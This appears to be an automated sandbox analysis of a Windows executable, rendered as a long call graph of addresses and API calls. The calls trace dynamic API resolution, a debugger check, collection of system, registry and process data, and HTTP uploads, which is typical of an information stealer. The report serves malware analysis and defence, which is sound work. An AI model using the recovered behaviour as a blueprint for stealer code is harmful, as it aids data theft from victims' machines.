b7318b 14333->14334 14335 b745c0 2 API calls 14334->14335 14336 b731a4 14335->14336 14337 b745c0 2 API calls 14336->14337 14338 b731bd 14337->14338 14339 b745c0 2 API calls 14338->14339 14340 b731d6 14339->14340 14341 b745c0 2 API calls 14340->14341 14342 b731ef 14341->14342 14343 b745c0 2 API calls 14342->14343 14344 b73208 14343->14344 14345 b745c0 2 API calls 14344->14345 14346 b73221 14345->14346 14347 b745c0 2 API calls 14346->14347 14348 b7323a 14347->14348 14349 b745c0 2 API calls 14348->14349 14350 b73253 14349->14350 14351 b745c0 2 API calls 14350->14351 14352 b7326c 14351->14352 14353 b745c0 2 API calls 14352->14353 14354 b73285 14353->14354 14355 b745c0 2 API calls 14354->14355 14356 b7329e 14355->14356 14357 b745c0 2 API calls 
14356->14357 14358 b732b7 14357->14358 14359 b745c0 2 API calls 14358->14359 14360 b732d0 14359->14360 14361 b745c0 2 API calls 14360->14361 14362 b732e9 14361->14362 14363 b745c0 2 API calls 14362->14363 14364 b73302 14363->14364 14365 b745c0 2 API calls 14364->14365 14366 b7331b 14365->14366 14367 b745c0 2 API calls 14366->14367 14368 b73334 14367->14368 14369 b745c0 2 API calls 14368->14369 14370 b7334d 14369->14370 14371 b745c0 2 API calls 14370->14371 14372 b73366 14371->14372 14373 b745c0 2 API calls 14372->14373 14374 b7337f 14373->14374 14375 b745c0 2 API calls 14374->14375 14376 b73398 14375->14376 14377 b745c0 2 API calls 14376->14377 14378 b733b1 14377->14378 14379 b745c0 2 API calls 14378->14379 14380 b733ca 14379->14380 14381 b745c0 2 API calls 14380->14381 14382 b733e3 14381->14382 14383 b745c0 2 API calls 14382->14383 14384 b733fc 14383->14384 14385 b745c0 2 API calls 14384->14385 14386 b73415 14385->14386 14387 b745c0 2 API calls 14386->14387 14388 b7342e 14387->14388 14389 b745c0 2 API calls 14388->14389 14390 b73447 14389->14390 14391 b745c0 2 API calls 14390->14391 14392 b73460 14391->14392 14393 b745c0 2 API calls 14392->14393 14394 b73479 14393->14394 14395 b745c0 2 API calls 14394->14395 14396 b73492 14395->14396 14397 b745c0 2 API calls 14396->14397 14398 b734ab 14397->14398 14399 b745c0 2 API calls 14398->14399 14400 b734c4 14399->14400 14401 b745c0 2 API calls 14400->14401 14402 b734dd 14401->14402 14403 b745c0 2 API calls 14402->14403 14404 b734f6 14403->14404 14405 b745c0 2 API calls 14404->14405 14406 b7350f 14405->14406 14407 b745c0 2 API calls 14406->14407 14408 b73528 14407->14408 14409 b745c0 2 API calls 14408->14409 14410 b73541 14409->14410 14411 b745c0 2 API calls 14410->14411 14412 b7355a 14411->14412 14413 b745c0 2 API calls 14412->14413 14414 b73573 14413->14414 14415 b745c0 2 API calls 14414->14415 14416 b7358c 14415->14416 14417 b745c0 2 API calls 14416->14417 14418 b735a5 14417->14418 14419 b745c0 2 API calls 14418->14419 
14420 b735be 14419->14420 14421 b745c0 2 API calls 14420->14421 14422 b735d7 14421->14422 14423 b745c0 2 API calls 14422->14423 14424 b735f0 14423->14424 14425 b745c0 2 API calls 14424->14425 14426 b73609 14425->14426 14427 b745c0 2 API calls 14426->14427 14428 b73622 14427->14428 14429 b745c0 2 API calls 14428->14429 14430 b7363b 14429->14430 14431 b745c0 2 API calls 14430->14431 14432 b73654 14431->14432 14433 b745c0 2 API calls 14432->14433 14434 b7366d 14433->14434 14435 b745c0 2 API calls 14434->14435 14436 b73686 14435->14436 14437 b745c0 2 API calls 14436->14437 14438 b7369f 14437->14438 14439 b745c0 2 API calls 14438->14439 14440 b736b8 14439->14440 14441 b745c0 2 API calls 14440->14441 14442 b736d1 14441->14442 14443 b745c0 2 API calls 14442->14443 14444 b736ea 14443->14444 14445 b745c0 2 API calls 14444->14445 14446 b73703 14445->14446 14447 b745c0 2 API calls 14446->14447 14448 b7371c 14447->14448 14449 b745c0 2 API calls 14448->14449 14450 b73735 14449->14450 14451 b745c0 2 API calls 14450->14451 14452 b7374e 14451->14452 14453 b745c0 2 API calls 14452->14453 14454 b73767 14453->14454 14455 b745c0 2 API calls 14454->14455 14456 b73780 14455->14456 14457 b745c0 2 API calls 14456->14457 14458 b73799 14457->14458 14459 b745c0 2 API calls 14458->14459 14460 b737b2 14459->14460 14461 b745c0 2 API calls 14460->14461 14462 b737cb 14461->14462 14463 b745c0 2 API calls 14462->14463 14464 b737e4 14463->14464 14465 b745c0 2 API calls 14464->14465 14466 b737fd 14465->14466 14467 b745c0 2 API calls 14466->14467 14468 b73816 14467->14468 14469 b745c0 2 API calls 14468->14469 14470 b7382f 14469->14470 14471 b745c0 2 API calls 14470->14471 14472 b73848 14471->14472 14473 b745c0 2 API calls 14472->14473 14474 b73861 14473->14474 14475 b745c0 2 API calls 14474->14475 14476 b7387a 14475->14476 14477 b745c0 2 API calls 14476->14477 14478 b73893 14477->14478 14479 b745c0 2 API calls 14478->14479 14480 b738ac 14479->14480 14481 b745c0 2 API calls 14480->14481 14482 b738c5 
14481->14482 14483 b745c0 2 API calls 14482->14483 14484 b738de 14483->14484 14485 b745c0 2 API calls 14484->14485 14486 b738f7 14485->14486 14487 b745c0 2 API calls 14486->14487 14488 b73910 14487->14488 14489 b745c0 2 API calls 14488->14489 14490 b73929 14489->14490 14491 b745c0 2 API calls 14490->14491 14492 b73942 14491->14492 14493 b745c0 2 API calls 14492->14493 14494 b7395b 14493->14494 14495 b745c0 2 API calls 14494->14495 14496 b73974 14495->14496 14497 b745c0 2 API calls 14496->14497 14498 b7398d 14497->14498 14499 b745c0 2 API calls 14498->14499 14500 b739a6 14499->14500 14501 b745c0 2 API calls 14500->14501 14502 b739bf 14501->14502 14503 b745c0 2 API calls 14502->14503 14504 b739d8 14503->14504 14505 b745c0 2 API calls 14504->14505 14506 b739f1 14505->14506 14507 b745c0 2 API calls 14506->14507 14508 b73a0a 14507->14508 14509 b745c0 2 API calls 14508->14509 14510 b73a23 14509->14510 14511 b745c0 2 API calls 14510->14511 14512 b73a3c 14511->14512 14513 b745c0 2 API calls 14512->14513 14514 b73a55 14513->14514 14515 b745c0 2 API calls 14514->14515 14516 b73a6e 14515->14516 14517 b745c0 2 API calls 14516->14517 14518 b73a87 14517->14518 14519 b745c0 2 API calls 14518->14519 14520 b73aa0 14519->14520 14521 b745c0 2 API calls 14520->14521 14522 b73ab9 14521->14522 14523 b745c0 2 API calls 14522->14523 14524 b73ad2 14523->14524 14525 b745c0 2 API calls 14524->14525 14526 b73aeb 14525->14526 14527 b745c0 2 API calls 14526->14527 14528 b73b04 14527->14528 14529 b745c0 2 API calls 14528->14529 14530 b73b1d 14529->14530 14531 b745c0 2 API calls 14530->14531 14532 b73b36 14531->14532 14533 b745c0 2 API calls 14532->14533 14534 b73b4f 14533->14534 14535 b745c0 2 API calls 14534->14535 14536 b73b68 14535->14536 14537 b745c0 2 API calls 14536->14537 14538 b73b81 14537->14538 14539 b745c0 2 API calls 14538->14539 14540 b73b9a 14539->14540 14541 b745c0 2 API calls 14540->14541 14542 b73bb3 14541->14542 14543 b745c0 2 API calls 14542->14543 14544 b73bcc 14543->14544 
14545 b745c0 2 API calls 14544->14545 14546 b73be5 14545->14546 14547 b745c0 2 API calls 14546->14547 14548 b73bfe 14547->14548 14549 b745c0 2 API calls 14548->14549 14550 b73c17 14549->14550 14551 b745c0 2 API calls 14550->14551 14552 b73c30 14551->14552 14553 b745c0 2 API calls 14552->14553 14554 b73c49 14553->14554 14555 b745c0 2 API calls 14554->14555 14556 b73c62 14555->14556 14557 b745c0 2 API calls 14556->14557 14558 b73c7b 14557->14558 14559 b745c0 2 API calls 14558->14559 14560 b73c94 14559->14560 14561 b745c0 2 API calls 14560->14561 14562 b73cad 14561->14562 14563 b745c0 2 API calls 14562->14563 14564 b73cc6 14563->14564 14565 b745c0 2 API calls 14564->14565 14566 b73cdf 14565->14566 14567 b745c0 2 API calls 14566->14567 14568 b73cf8 14567->14568 14569 b745c0 2 API calls 14568->14569 14570 b73d11 14569->14570 14571 b745c0 2 API calls 14570->14571 14572 b73d2a 14571->14572 14573 b745c0 2 API calls 14572->14573 14574 b73d43 14573->14574 14575 b745c0 2 API calls 14574->14575 14576 b73d5c 14575->14576 14577 b745c0 2 API calls 14576->14577 14578 b73d75 14577->14578 14579 b745c0 2 API calls 14578->14579 14580 b73d8e 14579->14580 14581 b745c0 2 API calls 14580->14581 14582 b73da7 14581->14582 14583 b745c0 2 API calls 14582->14583 14584 b73dc0 14583->14584 14585 b745c0 2 API calls 14584->14585 14586 b73dd9 14585->14586 14587 b745c0 2 API calls 14586->14587 14588 b73df2 14587->14588 14589 b745c0 2 API calls 14588->14589 14590 b73e0b 14589->14590 14591 b745c0 2 API calls 14590->14591 14592 b73e24 14591->14592 14593 b745c0 2 API calls 14592->14593 14594 b73e3d 14593->14594 14595 b745c0 2 API calls 14594->14595 14596 b73e56 14595->14596 14597 b745c0 2 API calls 14596->14597 14598 b73e6f 14597->14598 14599 b745c0 2 API calls 14598->14599 14600 b73e88 14599->14600 14601 b745c0 2 API calls 14600->14601 14602 b73ea1 14601->14602 14603 b745c0 2 API calls 14602->14603 14604 b73eba 14603->14604 14605 b745c0 2 API calls 14604->14605 14606 b73ed3 14605->14606 14607 b745c0 2 
API calls 14606->14607 14608 b73eec 14607->14608 14609 b745c0 2 API calls 14608->14609 14610 b73f05 14609->14610 14611 b745c0 2 API calls 14610->14611 14612 b73f1e 14611->14612 14613 b745c0 2 API calls 14612->14613 14614 b73f37 14613->14614 14615 b745c0 2 API calls 14614->14615 14616 b73f50 14615->14616 14617 b745c0 2 API calls 14616->14617 14618 b73f69 14617->14618 14619 b745c0 2 API calls 14618->14619 14620 b73f82 14619->14620 14621 b745c0 2 API calls 14620->14621 14622 b73f9b 14621->14622 14623 b745c0 2 API calls 14622->14623 14624 b73fb4 14623->14624 14625 b745c0 2 API calls 14624->14625 14626 b73fcd 14625->14626 14627 b745c0 2 API calls 14626->14627 14628 b73fe6 14627->14628 14629 b745c0 2 API calls 14628->14629 14630 b73fff 14629->14630 14631 b745c0 2 API calls 14630->14631 14632 b74018 14631->14632 14633 b745c0 2 API calls 14632->14633 14634 b74031 14633->14634 14635 b745c0 2 API calls 14634->14635 14636 b7404a 14635->14636 14637 b745c0 2 API calls 14636->14637 14638 b74063 14637->14638 14639 b745c0 2 API calls 14638->14639 14640 b7407c 14639->14640 14641 b745c0 2 API calls 14640->14641 14642 b74095 14641->14642 14643 b745c0 2 API calls 14642->14643 14644 b740ae 14643->14644 14645 b745c0 2 API calls 14644->14645 14646 b740c7 14645->14646 14647 b745c0 2 API calls 14646->14647 14648 b740e0 14647->14648 14649 b745c0 2 API calls 14648->14649 14650 b740f9 14649->14650 14651 b745c0 2 API calls 14650->14651 14652 b74112 14651->14652 14653 b745c0 2 API calls 14652->14653 14654 b7412b 14653->14654 14655 b745c0 2 API calls 14654->14655 14656 b74144 14655->14656 14657 b745c0 2 API calls 14656->14657 14658 b7415d 14657->14658 14659 b745c0 2 API calls 14658->14659 14660 b74176 14659->14660 14661 b745c0 2 API calls 14660->14661 14662 b7418f 14661->14662 14663 b745c0 2 API calls 14662->14663 14664 b741a8 14663->14664 14665 b745c0 2 API calls 14664->14665 14666 b741c1 14665->14666 14667 b745c0 2 API calls 14666->14667 14668 b741da 14667->14668 14669 b745c0 2 API calls 
14668->14669 14670 b741f3 14669->14670 14671 b745c0 2 API calls 14670->14671 14672 b7420c 14671->14672 14673 b745c0 2 API calls 14672->14673 14674 b74225 14673->14674 14675 b745c0 2 API calls 14674->14675 14676 b7423e 14675->14676 14677 b745c0 2 API calls 14676->14677 14678 b74257 14677->14678 14679 b745c0 2 API calls 14678->14679 14680 b74270 14679->14680 14681 b745c0 2 API calls 14680->14681 14682 b74289 14681->14682 14683 b745c0 2 API calls 14682->14683 14684 b742a2 14683->14684 14685 b745c0 2 API calls 14684->14685 14686 b742bb 14685->14686 14687 b745c0 2 API calls 14686->14687 14688 b742d4 14687->14688 14689 b745c0 2 API calls 14688->14689 14690 b742ed 14689->14690 14691 b745c0 2 API calls 14690->14691 14692 b74306 14691->14692 14693 b745c0 2 API calls 14692->14693 14694 b7431f 14693->14694 14695 b745c0 2 API calls 14694->14695 14696 b74338 14695->14696 14697 b745c0 2 API calls 14696->14697 14698 b74351 14697->14698 14699 b745c0 2 API calls 14698->14699 14700 b7436a 14699->14700 14701 b745c0 2 API calls 14700->14701 14702 b74383 14701->14702 14703 b745c0 2 API calls 14702->14703 14704 b7439c 14703->14704 14705 b745c0 2 API calls 14704->14705 14706 b743b5 14705->14706 14707 b745c0 2 API calls 14706->14707 14708 b743ce 14707->14708 14709 b745c0 2 API calls 14708->14709 14710 b743e7 14709->14710 14711 b745c0 2 API calls 14710->14711 14712 b74400 14711->14712 14713 b745c0 2 API calls 14712->14713 14714 b74419 14713->14714 14715 b745c0 2 API calls 14714->14715 14716 b74432 14715->14716 14717 b745c0 2 API calls 14716->14717 14718 b7444b 14717->14718 14719 b745c0 2 API calls 14718->14719 14720 b74464 14719->14720 14721 b745c0 2 API calls 14720->14721 14722 b7447d 14721->14722 14723 b745c0 2 API calls 14722->14723 14724 b74496 14723->14724 14725 b745c0 2 API calls 14724->14725 14726 b744af 14725->14726 14727 b745c0 2 API calls 14726->14727 14728 b744c8 14727->14728 14729 b745c0 2 API calls 14728->14729 14730 b744e1 14729->14730 14731 b745c0 2 API calls 14730->14731 
14732 b744fa 14731->14732 14733 b745c0 2 API calls 14732->14733 14734 b74513 14733->14734 14735 b745c0 2 API calls 14734->14735 14736 b7452c 14735->14736 14737 b745c0 2 API calls 14736->14737 14738 b74545 14737->14738 14739 b745c0 2 API calls 14738->14739 14740 b7455e 14739->14740 14741 b745c0 2 API calls 14740->14741 14742 b74577 14741->14742 14743 b745c0 2 API calls 14742->14743 14744 b74590 14743->14744 14745 b745c0 2 API calls 14744->14745 14746 b745a9 14745->14746 14747 b89c10 14746->14747 14748 b89c20 43 API calls 14747->14748 14749 b8a036 8 API calls 14747->14749 14748->14749 14750 b8a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14749->14750 14751 b8a146 14749->14751 14750->14751 14752 b8a153 8 API calls 14751->14752 14753 b8a216 14751->14753 14752->14753 14754 b8a298 14753->14754 14755 b8a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14753->14755 14756 b8a2a5 6 API calls 14754->14756 14757 b8a337 14754->14757 14755->14754 14756->14757 14758 b8a41f 14757->14758 14759 b8a344 9 API calls 14757->14759 14760 b8a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14758->14760 14761 b8a4a2 14758->14761 14759->14758 14760->14761 14762 b8a4ab GetProcAddress GetProcAddress 14761->14762 14763 b8a4dc 14761->14763 14762->14763 14764 b8a515 14763->14764 14765 b8a4e5 GetProcAddress GetProcAddress 14763->14765 14766 b8a612 14764->14766 14767 b8a522 10 API calls 14764->14767 14765->14764 14768 b8a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14766->14768 14769 b8a67d 14766->14769 14767->14766 14768->14769 14770 b8a69e 14769->14770 14771 b8a686 GetProcAddress 14769->14771 14772 b85ca3 14770->14772 14773 b8a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14770->14773 14771->14770 14774 b71590 14772->14774 14773->14772 15895 b71670 14774->15895 14777 b8a7a0 lstrcpy 14778 b715b5 14777->14778 14779 b8a7a0 lstrcpy 14778->14779 14780 b715c7 14779->14780 
14781 b8a7a0 lstrcpy 14780->14781 14782 b715d9 14781->14782 14783 b8a7a0 lstrcpy 14782->14783 14784 b71663 14783->14784 14785 b85510 14784->14785 14786 b85521 14785->14786 14787 b8a820 2 API calls 14786->14787 14788 b8552e 14787->14788 14789 b8a820 2 API calls 14788->14789 14790 b8553b 14789->14790 14791 b8a820 2 API calls 14790->14791 14792 b85548 14791->14792 14793 b8a740 lstrcpy 14792->14793 14794 b85555 14793->14794 14795 b8a740 lstrcpy 14794->14795 14796 b85562 14795->14796 14797 b8a740 lstrcpy 14796->14797 14798 b8556f 14797->14798 14799 b8a740 lstrcpy 14798->14799 14839 b8557c 14799->14839 14800 b8a740 lstrcpy 14800->14839 14801 b85643 StrCmpCA 14801->14839 14802 b856a0 StrCmpCA 14803 b857dc 14802->14803 14802->14839 14804 b8a8a0 lstrcpy 14803->14804 14805 b857e8 14804->14805 14806 b8a820 2 API calls 14805->14806 14808 b857f6 14806->14808 14807 b8a820 lstrlen lstrcpy 14807->14839 14810 b8a820 2 API calls 14808->14810 14809 b85856 StrCmpCA 14811 b85991 14809->14811 14809->14839 14813 b85805 14810->14813 14812 b8a8a0 lstrcpy 14811->14812 14814 b8599d 14812->14814 14815 b71670 lstrcpy 14813->14815 14816 b8a820 2 API calls 14814->14816 14836 b85811 14815->14836 14817 b859ab 14816->14817 14819 b8a820 2 API calls 14817->14819 14818 b85a0b StrCmpCA 14820 b85a28 14818->14820 14821 b85a16 Sleep 14818->14821 14822 b859ba 14819->14822 14823 b8a8a0 lstrcpy 14820->14823 14821->14839 14824 b71670 lstrcpy 14822->14824 14825 b85a34 14823->14825 14824->14836 14826 b8a820 2 API calls 14825->14826 14827 b85a43 14826->14827 14829 b8a820 2 API calls 14827->14829 14828 b852c0 25 API calls 14828->14839 14830 b85a52 14829->14830 14833 b71670 lstrcpy 14830->14833 14831 b8a8a0 lstrcpy 14831->14839 14832 b8578a StrCmpCA 14832->14839 14833->14836 14834 b8a7a0 lstrcpy 14834->14839 14835 b8593f StrCmpCA 14835->14839 14836->13892 14837 b851f0 20 API calls 14837->14839 14838 b71590 lstrcpy 14838->14839 14839->14800 14839->14801 14839->14802 14839->14807 14839->14809 14839->14818 
14839->14828 14839->14831 14839->14832 14839->14834 14839->14835 14839->14837 14839->14838 14841 b8754c 14840->14841 14842 b87553 GetVolumeInformationA 14840->14842 14841->14842 14843 b87591 14842->14843 14844 b875fc GetProcessHeap RtlAllocateHeap 14843->14844 14845 b87628 wsprintfA 14844->14845 14846 b87619 14844->14846 14848 b8a740 lstrcpy 14845->14848 14847 b8a740 lstrcpy 14846->14847 14849 b85da7 14847->14849 14848->14849 14849->13913 14851 b8a7a0 lstrcpy 14850->14851 14852 b74899 14851->14852 15904 b747b0 14852->15904 14854 b748a5 14855 b8a740 lstrcpy 14854->14855 14856 b748d7 14855->14856 14857 b8a740 lstrcpy 14856->14857 14858 b748e4 14857->14858 14859 b8a740 lstrcpy 14858->14859 14860 b748f1 14859->14860 14861 b8a740 lstrcpy 14860->14861 14862 b748fe 14861->14862 14863 b8a740 lstrcpy 14862->14863 14864 b7490b InternetOpenA StrCmpCA 14863->14864 14865 b74944 14864->14865 14866 b74ecb InternetCloseHandle 14865->14866 15910 b88b60 14865->15910 14867 b74ee8 14866->14867 15925 b79ac0 CryptStringToBinaryA 14867->15925 14869 b74963 15918 b8a920 14869->15918 14872 b74976 14873 b8a8a0 lstrcpy 14872->14873 14879 b7497f 14873->14879 14875 b8a820 2 API calls 14876 b74f05 14875->14876 14878 b8a9b0 4 API calls 14876->14878 14877 b74f27 ctype 14881 b8a7a0 lstrcpy 14877->14881 14880 b74f1b 14878->14880 14883 b8a9b0 4 API calls 14879->14883 14882 b8a8a0 lstrcpy 14880->14882 14894 b74f57 14881->14894 14882->14877 14884 b749a9 14883->14884 14885 b8a8a0 lstrcpy 14884->14885 14886 b749b2 14885->14886 14887 b8a9b0 4 API calls 14886->14887 14888 b749d1 14887->14888 14889 b8a8a0 lstrcpy 14888->14889 14890 b749da 14889->14890 14891 b8a920 3 API calls 14890->14891 14892 b749f8 14891->14892 14893 b8a8a0 lstrcpy 14892->14893 14895 b74a01 14893->14895 14894->13916 14896 b8a9b0 4 API calls 14895->14896 14897 b74a20 14896->14897 14898 b8a8a0 lstrcpy 14897->14898 14899 b74a29 14898->14899 14900 b8a9b0 4 API calls 14899->14900 14901 b74a48 14900->14901 14902 b8a8a0 lstrcpy 14901->14902 
14903 b74a51 14902->14903 14904 b8a9b0 4 API calls 14903->14904 14905 b74a7d 14904->14905 14906 b8a920 3 API calls 14905->14906 14907 b74a84 14906->14907 14908 b8a8a0 lstrcpy 14907->14908 14909 b74a8d 14908->14909 14910 b74aa3 InternetConnectA 14909->14910 14910->14866 14911 b74ad3 HttpOpenRequestA 14910->14911 14913 b74ebe InternetCloseHandle 14911->14913 14914 b74b28 14911->14914 14913->14866 14915 b8a9b0 4 API calls 14914->14915 14916 b74b3c 14915->14916 14917 b8a8a0 lstrcpy 14916->14917 14918 b74b45 14917->14918 14919 b8a920 3 API calls 14918->14919 14920 b74b63 14919->14920 14921 b8a8a0 lstrcpy 14920->14921 14922 b74b6c 14921->14922 14923 b8a9b0 4 API calls 14922->14923 14924 b74b8b 14923->14924 14925 b8a8a0 lstrcpy 14924->14925 14926 b74b94 14925->14926 14927 b8a9b0 4 API calls 14926->14927 14928 b74bb5 14927->14928 14929 b8a8a0 lstrcpy 14928->14929 14930 b74bbe 14929->14930 14931 b8a9b0 4 API calls 14930->14931 14932 b74bde 14931->14932 14933 b8a8a0 lstrcpy 14932->14933 14934 b74be7 14933->14934 14935 b8a9b0 4 API calls 14934->14935 14936 b74c06 14935->14936 14937 b8a8a0 lstrcpy 14936->14937 14938 b74c0f 14937->14938 14939 b8a920 3 API calls 14938->14939 14940 b74c2d 14939->14940 14941 b8a8a0 lstrcpy 14940->14941 14942 b74c36 14941->14942 14943 b8a9b0 4 API calls 14942->14943 14944 b74c55 14943->14944 14945 b8a8a0 lstrcpy 14944->14945 14946 b74c5e 14945->14946 14947 b8a9b0 4 API calls 14946->14947 14948 b74c7d 14947->14948 14949 b8a8a0 lstrcpy 14948->14949 14950 b74c86 14949->14950 14951 b8a920 3 API calls 14950->14951 14952 b74ca4 14951->14952 14953 b8a8a0 lstrcpy 14952->14953 14954 b74cad 14953->14954 14955 b8a9b0 4 API calls 14954->14955 14956 b74ccc 14955->14956 14957 b8a8a0 lstrcpy 14956->14957 14958 b74cd5 14957->14958 14959 b8a9b0 4 API calls 14958->14959 14960 b74cf6 14959->14960 14961 b8a8a0 lstrcpy 14960->14961 14962 b74cff 14961->14962 14963 b8a9b0 4 API calls 14962->14963 14964 b74d1f 14963->14964 14965 b8a8a0 lstrcpy 14964->14965 14966 b74d28 
                                [Call graph rendering: the raw node and edge list of this graph is not reproduced. API calls recoverable from its nodes, grouped by the routine they belong to:]
                                • b74d47-b74e67: lstrcpy/lstrlen string assembly (helpers b8a740, b8a8a0, b8a920, b8a9b0), then HttpSendRequestA (b74e13), an InternetReadFile loop (b74e32) and InternetCloseHandle (b74e67)
                                • b817c4-b819c2: StrCmpCA (b817c4) with ExitProcess (b817cf) on one branch, followed by a chain of StrCmpCA comparisons at b8185d, b8187f, b818ad, b818cf, b818f1, b81913, b81932, b81951 and b81970
                                • b75979-b75fe6: lstrcpy string assembly, InternetOpenA and StrCmpCA (b759ee), b88b60 (GetSystemTime), InternetConnectA (b75b7c), HttpOpenRequestA (b75bac), lstrlen with GetProcessHeap/RtlAllocateHeap (b75e81), HttpSendRequestA (b75f2a), an InternetReadFile loop (b75f35) and InternetCloseHandle (b75f6a, b75fb6, b75fc3)
                                • b80db7-b81044 and b80759-b80a49: StrCmpCA dispatch (b80e27, b80e67, b80ea4, b80fb2; b80799, b80865, b8099c) with lstrlen/lstrcpy, calling b7fb00, b80030 and b80250
                                • b81a26-b8268d: system profile assembled with lstrcpy/lstrcat from the helpers b87690 and b87720 (GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey), b877c0 (GetCurrentProcess, IsWow64Process), b87850 and b878e0 (3 API calls each), b87980 (GetLocalTime, wsprintfA), b87a30 (GetTimeZoneInformation, wsprintfA), b87b00 (GetUserDefaultLocaleName; b88d20: LocalAlloc, CharToOemW), b87b90 (GetKeyboardLayoutList, LocalAlloc, GetLocaleInfoA, LocalFree), b87d80 (GetSystemPowerStatus), GetCurrentProcessId (b8207e) with b89470 (OpenProcess, GetModuleFileNameExA, CloseHandle), b87e00 (RegOpenKeyExA, RegQueryValueExA, RegCloseKey), b87f60 (GetLogicalProcessorInformationEx, GetLastError, HeapFree, wsprintfA), b87ed0 (GetSystemInfo, wsprintfA), b88100 (GlobalMemoryStatusEx, __aulldiv, wsprintfA), b887c0 (GetProcessHeap, RtlAllocateHeap, wsprintfA), b881f0, b88320 (RegOpenKeyExA, RegEnumKeyExA, wsprintfA, RegOpenKeyExA, RegQueryValueExA, lstrlen, RegCloseKey; 17 API calls) and b88680 (CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle); the result is handed to b85190, which calls b75100
                                • b75100-b758d9: second HTTP routine: b747b0 (lstrlen, InternetCrackUrlA at b74848), string encoding via b88ea0 (CryptBinaryToStringA with GetProcessHeap/RtlAllocateHeap), InternetOpenA and StrCmpCA (b751fd), b88b60 (GetSystemTime), InternetConnectA (b75329), HttpOpenRequestA (b75359) and InternetCloseHandle (b758b7, b758c4)
                                • b75009-b750ec: InternetOpenUrlA (b75009), an InternetReadFile loop (b7502a) and two InternetCloseHandle calls (b750a0)
                                • b79af9-b79b39: LocalAlloc, CryptStringToBinaryA (b79b14), LocalFree
                                • b76d40-b76f41 with b76530 and b769b0: GetProcessHeap/RtlAllocateHeap (b88a10), VirtualAlloc (b7668f, b76743), LoadLibraryA (b76a09), GetProcAddress (b76ba8), VirtualFree (b76ee6), FreeLibrary (b76f26) and HeapFree (b889f0)

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph (basic blocks of b89860, with their outgoing edges):
                                • 660 b89860-b89874: call b89750 -> 663, 664
                                • 663 b8987a-b89a8e: call b89780, GetProcAddress * 21 -> 664
                                • 664 b89a93-b89af2: LoadLibraryA * 5 -> 666, 667
                                • 667 b89af4-b89b08: GetProcAddress -> 666
                                • 666 b89b0d-b89b14 -> 669, 670
                                • 670 b89b16-b89b41: GetProcAddress * 2 -> 669
                                • 669 b89b46-b89b4d -> 671, 672
                                • 672 b89b4f-b89b63: GetProcAddress -> 671
                                • 671 b89b68-b89b6f -> 673, 674
                                • 674 b89b71-b89b84: GetProcAddress -> 673
                                • 673 b89b89-b89b90 -> 675, 676
                                • 676 b89b92-b89bbc: GetProcAddress * 2 -> 675
                                • 675 b89bc1-b89bc2 (function exit)
                                APIs
                                • GetProcAddress.KERNEL32(75550000,009306D8), ref: 00B898A1
                                • GetProcAddress.KERNEL32(75550000,009306A8), ref: 00B898BA
                                • GetProcAddress.KERNEL32(75550000,009306C0), ref: 00B898D2
                                • GetProcAddress.KERNEL32(75550000,009306F0), ref: 00B898EA
                                • GetProcAddress.KERNEL32(75550000,009307B0), ref: 00B89903
                                • GetProcAddress.KERNEL32(75550000,00938890), ref: 00B8991B
                                • GetProcAddress.KERNEL32(75550000,00926600), ref: 00B89933
                                • GetProcAddress.KERNEL32(75550000,009264C0), ref: 00B8994C
                                • GetProcAddress.KERNEL32(75550000,00930558), ref: 00B89964
                                • GetProcAddress.KERNEL32(75550000,00930708), ref: 00B8997C
                                • GetProcAddress.KERNEL32(75550000,00930840), ref: 00B89995
                                • GetProcAddress.KERNEL32(75550000,00930720), ref: 00B899AD
                                • GetProcAddress.KERNEL32(75550000,009262E0), ref: 00B899C5
                                • GetProcAddress.KERNEL32(75550000,00930768), ref: 00B899DE
                                • GetProcAddress.KERNEL32(75550000,009307C8), ref: 00B899F6
                                • GetProcAddress.KERNEL32(75550000,009264E0), ref: 00B89A0E
                                • GetProcAddress.KERNEL32(75550000,00930798), ref: 00B89A27
                                • GetProcAddress.KERNEL32(75550000,00930870), ref: 00B89A3F
                                • GetProcAddress.KERNEL32(75550000,00926640), ref: 00B89A57
                                • GetProcAddress.KERNEL32(75550000,00930888), ref: 00B89A70
                                • GetProcAddress.KERNEL32(75550000,009265E0), ref: 00B89A88
                                • LoadLibraryA.KERNEL32(00930918,?,00B86A00), ref: 00B89A9A
                                • LoadLibraryA.KERNEL32(00930858,?,00B86A00), ref: 00B89AAB
                                • LoadLibraryA.KERNEL32(009308D0,?,00B86A00), ref: 00B89ABD
                                • LoadLibraryA.KERNEL32(009308B8,?,00B86A00), ref: 00B89ACF
                                • LoadLibraryA.KERNEL32(009308A0,?,00B86A00), ref: 00B89AE0
                                • GetProcAddress.KERNEL32(75670000,009308E8), ref: 00B89B02
                                • GetProcAddress.KERNEL32(75750000,00930900), ref: 00B89B23
                                • GetProcAddress.KERNEL32(75750000,00938C40), ref: 00B89B3B
                                • GetProcAddress.KERNEL32(76BE0000,00938EC8), ref: 00B89B5D
                                • GetProcAddress.KERNEL32(759D0000,00926540), ref: 00B89B7E
                                • GetProcAddress.KERNEL32(773F0000,00938900), ref: 00B89B9F
                                • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00B89BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00B89BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
